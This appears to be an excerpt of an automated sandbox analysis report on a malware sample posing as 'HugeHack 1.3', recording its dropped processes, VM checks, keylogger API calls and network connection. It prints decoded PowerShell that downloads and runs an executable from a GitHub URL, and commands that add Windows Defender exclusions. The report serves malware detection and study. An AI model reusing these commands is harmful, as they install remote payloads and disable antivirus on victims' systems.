Source: C:\Users\user\AppData\Roaming\dllhost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Thread delayed: delay time: 922337203685477

Source: javaw.exe, 00000005.00000003.1242547208.0000000014860000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: com/sun/corba/se/impl/util/SUNVMCID.classPK
Source: wscript.exe, 00000004.00000003.1307246955.0000000003479000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: javaw.exe, 00000005.00000003.1242547208.0000000014860000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: &com/sun/corba/se/impl/util/SUNVMCID.classPK
Source: Payload.exe, 00000002.00000002.1334619345.0000000003031000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VBoxService%\\.\PhysicalDrive0
Source: javaw.exe, 00000005.00000002.3691735562.00000000006C8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [Ljava/lang/VirtualMachineError;
Source: javaw.exe, 00000005.00000003.1242547208.0000000014860000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: org/omg/CORBA/OMGVMCID.classPK
Source: wscript.exe, 00000001.00000002.1270361152.0000000002C98000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: javaw.exe, 00000005.00000002.3691735562.00000000006C8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: cjava/lang/VirtualMachineError
Source: javaw.exe, 00000005.00000003.1242547208.0000000014860000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: java/lang/VirtualMachineError.classPK
Source: Payload.exe, 00000002.00000002.1334619345.0000000003031000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VBoxService
Source: javaw.exe, 00000005.00000002.3691735562.00000000006C8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllPL
Source: webhook.exe, 00000003.00000002.1327126250.0000000000BB1000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1712907932.00000000075B5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\AppData\Local\Temp\Payload.exe

Process information queried: ProcessInformation

Jump to behavior

Enables debug privileges

Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: C:\Users\user\AppData\Local\Temp\Payload.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Users\user\AppData\Roaming\dllhost.exe

Network Connect: 46.121.250.34 7777

.NET source code references suspicious native API functions

Source: Payload.exe.0.dr, kl.cs	Reference to suspicious API methods: MapVirtualKey(a, 0u)
Source: Payload.exe.0.dr, kl.cs	Reference to suspicious API methods: GetAsyncKeyState(num2)
Source: Payload.exe.0.dr, OK.cs	Reference to suspicious API methods: capGetDriverDescriptionA(wDriver, ref lpszName, 100, ref lpszVer, 100)

Adds a directory exclusion to Windows Defender

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath " C:\
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath " C:\

Encrypted powershell cmdline option found

Source: C:\Windows\SysWOW64\wscript.exe	Process created: Base64 decoded powershell.exe -command "Add-MpPreference -ExclusionPath "C:\
Source: C:\Windows\SysWOW64\wscript.exe	Process created: Base64 decoded reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /v C:\
Source: C:\Windows\SysWOW64\wscript.exe	Process created: Base64 decoded $url = "https://github.com/AnonAm0369/am/raw/refs/heads/main/RuntimeBroker.exe"$output = "$env:Temp/RuntimeBroker.exe"Invoke-WebRequest -Uri $url -OutFile $outputStart-Process -FilePath $output
Source: C:\Windows\SysWOW64\wscript.exe	Process created: Base64 decoded powershell.exe -command "Add-MpPreference -ExclusionPath "C:\	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: Base64 decoded reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /v C:\	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: Base64 decoded $url = "https://github.com/AnonAm0369/am/raw/refs/heads/main/RuntimeBroker.exe"$output = "$env:Temp/RuntimeBroker.exe"Invoke-WebRequest -Uri $url -OutFile $outputStart-Process -FilePath $output	Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\HugeHack 1.3.exe.bin.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\ere.js"	Jump to behavior
Source: C:\Users\user\Desktop\HugeHack 1.3.exe.bin.exe	Process created: C:\Users\user\AppData\Local\Temp\Payload.exe "C:\Users\user\AppData\Local\Temp\Payload.exe"	Jump to behavior
Source: C:\Users\user\Desktop\HugeHack 1.3.exe.bin.exe	Process created: C:\Users\user\AppData\Local\Temp\webhook.exe "C:\Users\user\AppData\Local\Temp\webhook.exe"	Jump to behavior
Source: C:\Users\user\Desktop\HugeHack 1.3.exe.bin.exe	Process created: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe "C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\user\AppData\Local\Temp\HugeHack.jar"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\SysWOW64\WScript.exe" "C:\Users\user\AppData\Local\Temp\ere.js" /elevate	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Process created: C:\Users\user\AppData\Roaming\dllhost.exe "C:\Users\user\AppData\Roaming\dllhost.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBjAG8AbQBtAGEAbgBkACAAIgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAIgBDADoAXAANAAoA	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc cgBlAGcAIABhAGQAZAAgACIASABLAEwATQBcAFMATwBGAFQAVwBBAFIARQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgBcAEUAeABjAGwAdQBzAGkAbwBuAHMAXABQAGEAdABoAHMAIgAgAC8AdgAgAEMAOgBcAA==	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc JAB1AHIAbAAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBnAGkAdABoAHUAYgAuAGMAbwBtAC8AQQBuAG8AbgBBAG0AMAAzADYAOQAvAGEAbQAvAHIAYQB3AC8AcgBlAGYAcwAvAGgAZQBhAGQAcwAvAG0AYQBpAG4ALwBSAHUAbgB0AGkAbQBlAEIAcgBvAGsAZQByAC4AZQB4AGUAIgANAAoAJABvAHUAdABwAHUAdAAgAD0AIAAiACQAZQBuAHYAOgBUAGUAbQBwAC8AUgB1AG4AdABpAG0AZQBCAHIAbwBrAGUAcgAuAGUAeABlACIADQAKAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQByAGkAIAAkAHUAcgBsACAALQBPAHUAdABGAGkAbABlACAAJABvAHUAdABwAHUAdAANAAoAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAJABvAHUAdABwAHUAdAA=	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath " C:\
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /v C:\

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -enc cgblagcaiabhagqazaagaciasablaewatqbcafmatwbgafqavwbbafiarqbcafaabwbsagkaywbpaguacwbcae0aaqbjahiabwbzag8azgb0afwavwbpag4azabvahcacwagaeqazqbmaguabgbkaguacgbcaeuaeabjagwadqbzagkabwbuahmaxabqageadaboahmaigagac8adgagaemaogbcaa==
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -enc jab1ahiabaagad0aiaaiaggadab0ahaacwa6ac8alwbnagkadaboahuaygauagmabwbtac8aqqbuag8abgbbag0amaazadyaoqavageabqavahiayqb3ac8acgblagyacwavaggazqbhagqacwavag0ayqbpag4alwbsahuabgb0agkabqblaeiacgbvagsazqbyac4azqb4aguaiganaaoajabvahuadabwahuadaagad0aiaaiacqazqbuahyaogbuaguabqbwac8augb1ag4adabpag0azqbcahiabwbraguacgauaguaeablaciadqakaekabgb2ag8aawblac0avwblagiaugblaheadqblahmadaagac0avqbyagkaiaakahuacgbsacaalqbpahuadabgagkabablacaajabvahuadabwahuadaanaaoauwb0ageacgb0ac0auabyag8aywblahmacwagac0argbpagwazqbqageadaboacaajabvahuadabwahuadaa=
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -enc cgblagcaiabhagqazaagaciasablaewatqbcafmatwbgafqavwbbafiarqbcafaabwbsagkaywbpaguacwbcae0aaqbjahiabwbzag8azgb0afwavwbpag4azabvahcacwagaeqazqbmaguabgbkaguacgbcaeuaeabjagwadqbzagkabwbuahmaxabqageadaboahmaigagac8adgagaemaogbcaa==	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -enc jab1ahiabaagad0aiaaiaggadab0ahaacwa6ac8alwbnagkadaboahuaygauagmabwbtac8aqqbuag8abgbbag0amaazadyaoqavageabqavahiayqb3ac8acgblagyacwavaggazqbhagqacwavag0ayqbpag4alwbsahuabgb0agkabqblaeiacgbvagsazqbyac4azqb4aguaiganaaoajabvahuadabwahuadaagad0aiaaiacqazqbuahyaogbuaguabqbwac8augb1ag4adabpag0azqbcahiabwbraguacgauaguaeablaciadqakaekabgb2ag8aawblac0avwblagiaugblaheadqblahmadaagac0avqbyagkaiaakahuacgbsacaalqbpahuadabgagkabablacaajabvahuadabwahuadaanaaoauwb0ageacgb0ac0auabyag8aywblahmacwagac0argbpagwazqbqageadaboacaajabvahuadabwahuadaa=	Jump to behavior

Source: HugeHack 1.3.exe.bin.exe, 00000000.00000003.1222228623.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp, Payload.exe, 00000002.00000000.1222141243.0000000000892000.00000002.00000001.01000000.00000005.sdmp, Payload.exe, 00000002.00000002.1334619345.0000000003031000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: HugeHack 1.3.exe.bin.exe, 00000000.00000003.1222228623.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp, Payload.exe, 00000002.00000000.1222141243.0000000000892000.00000002.00000001.01000000.00000005.sdmp, Payload.exe, 00000002.00000002.1334619345.0000000003031000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Progman
Source: HugeHack 1.3.exe.bin.exe, 00000000.00000003.1222228623.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp, Payload.exe, 00000002.00000000.1222141243.0000000000892000.00000002.00000001.01000000.00000005.sdmp, Payload.exe, 00000002.00000002.1334619345.0000000003031000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd+set CDAudio door open/set CDAudio door closed

Contains functionality to query CPU information (cpuid)

Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe

Code function: 5_2_022C03C0 cpuid

5_2_022C03C0

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\webhook.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
